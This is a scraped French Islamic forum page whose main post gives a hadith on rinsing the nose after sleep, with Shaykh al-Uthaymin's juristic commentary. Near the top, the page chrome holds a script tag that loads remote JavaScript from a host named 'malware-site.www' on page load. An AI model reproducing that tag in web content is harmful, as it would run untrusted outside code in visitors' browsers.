ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Novembre 2017

LunMarMerJeuVenSamDim
  12345
6789101112
13141516171819
20212223242526
27282930   

Calendrier Calendrier


    satan passe la nuit sur le nez

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    satan passe la nuit sur le nez

    Message par assalafia le Lun 23 Déc - 11:44

    Surprised 

    وعن أبي هريرة رضي الله عنه قال : قال رسول الله صلى الله عليه وسلم :

    إذا استيقظ أحدكم من نومه فليستنثر ثلالثاً ، فإن الشيطان يبيت على خيشومه

    .متفق عليه

    D'après 'Abû Hurayra radhiallahuanhu, le Prophète a dit:

    « Quand l'un de vous se réveille, qu'il aspire l'eau par ses narines trois fois; puis qu'il la rejette à chaque reprise; car le diable passe la nuit sur son nez »

    (Unanimement rapporté)

    Shaikh al-‘Utheymin rahimahullah dit en explication de ce hadith, dans Bulugh al-Marâm

    « Quand l’un de vous se réveille » : cela signifie se lever après avoir dormi, que ce soit dans la journée ou la nuit, mais l’expression en arabe «يبيت» (passe la nuit) indique que cela concerne seulement le sommeil de nuit.

    « ليستنثر ثلاثًا » / "qu'il aspire l'eau par ses narines trois fois, puis qu'il la rejette à chaque reprise" : الإستنثار c’est le fait de rejeter l’eau du nez après l’avoir aspiré, c’est-à-dire que tu aspires l’eau d’abord (c’est al-istinchâq), et ensuite tu la rejettes (c’est al-istinthâr), et ceci trois fois de suite.

    Mais le hadith ne dit pas si pour chaque istinthâr il y a une aspiration d’eau ou s’il fait l’istinthâr avec une seule aspiration d’eau.

    La réponse est que cela fait partie de ce qui excusé, s’il le veut, une seule poignée d’eau et s’il le veut trois.

    « الشيطان يبيت على خيشومه » / "car le diable passe la nuit sur son nez" : le alif lam devant شيطان (Shaytân) exprime une généralité, cela n’exprime pas de désignation particulière .
    Donc cela ne concerne pas un shaytân précis, mais l’ensemble du genre des shayâtîn (démons).

    Parmi les bénéfices de ce hadith

    Celui qui se réveille doit faire l’istinchâr, mais doit-on comprendre que c’est une obligation ?

    La base est al-wujûb (l’obligation) surtout si le Prophète a donné comme justification une chose contre laquelle nous devons nous prémunir : l’effet de Shaytân qui passe la nuit sur le nez…

    La confirmation du fait de se purifier trois fois, d’après sa parole « فليستنثر ثلاثًا» : est-ce que cela signifie que la purification doit nécessairement se faire trois fois et que se laver une fois ne suffit pas même si l’impureté a disparu ?

    Les deux sont possibles.

    On peut dire que cela concerne les autres impuretés selon l’avis de plusieurs juristes [fuqahâ] qui disent que la condition de la purification est qu’elle soit faite de trois lavements.

    Et pour le madhhab (école) hanbali, comme vous le savez, sept lavements.

    Le fait que tout soit fait par trois fois dans beaucoup de règles de la shari’ah.

    L’excellent enseignement du Prophète dans le sens où il lie le hukm à sa raison.

    Et cela comporte plusieurs fawâ-id :

     La généralité si cette raison est mentionnée dans d’autres textes

     La motivation de la personne à effectuer un acte ou s’en écarter, s’il contient du bien, cela le stimule, sinon il s’en éloigne
    Et cela fait partie des exhortations [targhîb] avec sa parole : « car le diable passe la nuit sur son nez »

     L’affirmation de la prophétie du Prophète car le fait qu’il sache que Shaytân passe la nuit sur le nez n’est pas perceptible [par les hommes].
    Si l’humanité se rassemblait pour essayer de le voir, elle n’y arriverait pas, mais le Prophète a la capacité de le percevoir par le biais de la révélation, car il ne connaît pas le monde invisible.

     La généralité de ce hadith dans le sens où l’ordre de l’istinthâr concerne chaque sommeil, selon sa parole «من نومه » (de son sommeil).

    Mais lorsqu’une cause est évoquée, cela indique l’exception [العلة تقتضي التخصيص] , et il a dit : « car le diable passe la nuit sur son nez ».

     Certains savants considèrent cette parole comme une généralité et disent que la justification n’implique pas l’exception.

     Et d’autres disent que la cause amène une spécificité à la généralité.

     De toutes les façons, nous disons que l’homme fait l’istinthâr trois fois même s’il dort le jour car les paroles du hadith englobent [aussi bien le jour que la nuit].

     Et la mention de la cause n’implique pas l’exception (de la généralité), comme la mention du hukm n’indique pas une exception*

    [Fin des paroles concernant ce hadith]

    * NDT : Pour plus d’explications concernant cette règle de fiqh, voir « Al-Ousoul min ‘Ilm al-Ousoul » de Shaikh al-‘Utheymin rahimahullah

    Source : Sharh du livre « Bulûgh al-marâm », chapitre sur la purification.
    copié de mamanetmoi.forumactif.com

    Cheikh Mouhammad Ibn Salih Ibn ’Outheymine

      La date/heure actuelle est Dim 19 Nov - 8:05